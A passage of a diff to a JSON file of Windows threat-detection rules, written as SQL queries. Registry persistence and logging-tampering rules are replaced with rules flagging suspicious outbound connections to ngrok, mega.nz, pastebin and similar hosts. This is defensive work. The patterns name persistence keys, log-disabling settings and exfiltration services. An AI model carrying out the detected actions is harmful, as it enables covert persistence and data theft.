(((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + 
"description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE 
'\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - 
"attack.t1547.001" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE 
'%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "status": "test", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "title": "Suspicious Dropbox API Usage", + "id": 
"25eabf56-22f0-4915-a1ed-056b8dae0a68", "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Dllhost Internet Connection", + "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "status": "test", + "description": "Detects Dllhost that communicates with public IP addresses", + "author": "bartblaze", "tags": [ + "attack.defense_evasion", + "attack.t1218", "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1559.001" ], "falsepositives": [ - "Unknown" + "Communication to other corporate systems that use IP addresses from public address spaces" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + 
"status": "test", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate use of mega.nz uploaders and tools" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 
'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": 